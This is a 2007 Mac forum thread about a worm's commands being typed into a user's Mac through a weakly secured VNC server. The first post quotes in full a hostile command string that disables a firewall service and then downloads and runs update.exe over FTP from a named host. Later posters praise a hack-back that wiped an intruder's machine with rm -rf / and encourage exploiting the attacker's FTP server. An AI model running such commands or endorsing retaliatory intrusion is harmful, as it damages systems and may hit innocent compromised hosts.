OS X worm?

Discussion in 'macOS' started by vd0t, May 22, 2007.

  1. vd0t macrumors regular

    Joined:
    Jun 7, 2005
    #1
    I think I may have a worm on my Mac! Since a few days ago, I noticed that every few hours, the following message is typed automatically:

    cmd /c net stop sharedaccess 7echo open elterryer.serveftp.net 21 .. ij 7echo user a b .. ij 7echo binary .. ij 7echo get update.exe .. ij 7echo bye .. ij 7ftp -n -v -s;ij 7del ij 7update.exe 7net start sharedaccess 7exit

    I don't think it will do any damage as it looks like its meant for Windows (look at update.exe). But I'm puzzled as to how it got to or runs on my Mac!

    How do I get rid of this?

    Thanks!
     
  2. Scarlet Fever macrumors 68040

    Scarlet Fever

    Joined:
    Jul 22, 2005
    Location:
    Bookshop!
    #2
    typed where? how did you get it? what programs are affected?

    more info needed before the people with torches and pitchforks start their riots :p
     
  3. wrldwzrd89 macrumors G5

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #3
    Check your Login Items (located under System Preferences -> Accounts) for anything strange running at startup. Also check your cron tables (an application like Cronnix makes this task much easier) and your launchd settings (use Lingon for this purpose) for anything set to automatically launch that you don't want launched.
     
  4. janey macrumors 603

    janey

    Joined:
    Dec 20, 2002
    Location:
    sunny los angeles
    #4
    abuse@dyndns.com

    some idiot's trying to do windows-y stuff on your mac. i suggest you mail whatever you're getting those from to the above email address.

    On the flip side, if you feel like being particularly evil...if you can ftp to that address and muck around with things...DO IT! :D

    I once had some idiot noob h4x0r try to ssh from a user with like zero privileges on my mac where the password was "password"...he couldn't get anything working, the idiot left a huge ton of addresses and passwords in the command history while he tried to use ssh/wget/curl/links to figure out some way to do something. i ssh'd into one of those from a different computer logged in as root and deleted everything. like rm -rf / kind of everything. eventually the connection was reset, probably cause the computer restarted :D
     
  5. vd0t thread starter macrumors regular

    Joined:
    Jun 7, 2005
    #5
    It's typed anywhere! So if I have TextEdit open, it will type it there. If the cursor is an a file - it will rename that file. If I'm watching a movie on quicktime, it will attempt to type (I hear the keyboard beep sound).

    I looked through my login items and don't see anything suspicious.
     
  6. janey macrumors 603

    janey

    Joined:
    Dec 20, 2002
    Location:
    sunny los angeles
    #6
    can you look through the Activity Monitor to see any weirdly named apps running? Or something like "ps aux > ~/Desktop/processes.txt"... and post "processes.txt" here...
     
  7. synth3tik macrumors 68040

    synth3tik

    Joined:
    Oct 11, 2006
    Location:
    Minneapolis, MN
    #7

    That is just so beautiful....:)
     
  8. johnee macrumors 6502a

    johnee

    #8
    maybe you should close ALL apps, and post a list of all processes running for everyone to review.
     
  9. janey macrumors 603

    janey

    Joined:
    Dec 20, 2002
    Location:
    sunny los angeles
    #9
    although i was being stupid about the easy-to-guess password (it was a throwaway account for testing), the guy was stupider for leaving behind so many passwords and sshing as root. i would have seen it eventually, but the first thing that tipped me off was little snitch blocking all sorts of stuff that only I'd usually be using. the guy even tried to use wget to download a copy of openssh to use..well, little snitch would block that too :D

    i just sat around watching what he was doing until he stopped..then i deleted stuff. it was the funniest thing ever.
     
  10. Queso macrumors G4

    Joined:
    Mar 4, 2006
    #10
    The hostname resolves to 72.244.39.101, which is registered to an ISP named Covad Communications in San Jose, California.

    E-mail address to report abuse is abuse-isp@covad.com

    Unfortunately this particular user does not have Telnet nor SSH running, but the FTP software identifies itself as "Serv-U FTP-Server v2.5e for WinSock" if anyone knows any exploits :)
     
  11. iBlue macrumors Core

    iBlue

    Joined:
    Mar 17, 2005
    Location:
    London, England
    #11
    I like your style. :D That. is. brilliant.
     
  12. localoid macrumors 68020

    localoid

    Joined:
    Feb 20, 2007
    Location:
    America's Third World
    #12
    This sounds something like W32.Kenety, which is a worm that affects Windows systems. Are you on a local network shared with any Windows machines?
     
  13. vd0t thread starter macrumors regular

    Joined:
    Jun 7, 2005
    #13
    I don't see anything suspicious in Activity Monitor.

    I have Parallels installed with Windows XP (never had any problems in the past). And I installed Vine Server (VNC server) recently so I can access my Mac from my Windows PC. I'm thinking this may be the culprit. But still doesn't really make sense to me.

    I have to leave for work and look more into this when I get home.
     
  14. SC68Cal macrumors 68000

    Joined:
    Feb 23, 2006
    #14
    THAT IS ABSOLUTELY BEAUTIFUL!

    Nice job backhacking.... as long as you toasted the hacker's machine, rather than someone's 0wned box that he was using as a gateway.

    VNC is the attack vector. Do you have a password set for it? Good lord plug that hole before he realizes that your running a *NIX and starts using the appropriate commands!
     
  15. vd0t thread starter macrumors regular

    Joined:
    Jun 7, 2005
    #15
    I changed the password to my VNC server. It seems like everything is ok now.
     
  16. headfuzz macrumors 6502

    headfuzz

    Joined:
    Apr 13, 2007
    Location:
    Brighton, UK
    #16
    That really is precious :D
     
  17. SC68Cal macrumors 68000

    Joined:
    Feb 23, 2006
    #17
    If your password for VNC was the same for any other services you use, I would strongly advice changing them as well. STRONGLY.
     
  18. CanadaRAM macrumors G5

    CanadaRAM

    Joined:
    Oct 11, 2004
    Location:
    On the Left Coast - Victoria BC Canada
    #18
    OK Gang, Everybody repeat after me:

    "As the very first thing I do on installation, I will change the default passwords on all of my security devices (Router/Firewall, VNC, etc. etc.)."
     
  19. janey macrumors 603

    janey

    Joined:
    Dec 20, 2002
    Location:
    sunny los angeles
    #19
    :D

    it wasn't really backhacking...and there wasn't anything in terms of actual user data that i could see except suspicious looking files, some of which the idiot was trying to get onto my box.
     
  20. vd0t thread starter macrumors regular

    Joined:
    Jun 7, 2005
    #20
    I originally chose a short password - which I've used in the past with no problems. But now I changed it to something stronger. Lesson learned! Thanks all!
     

Share This Page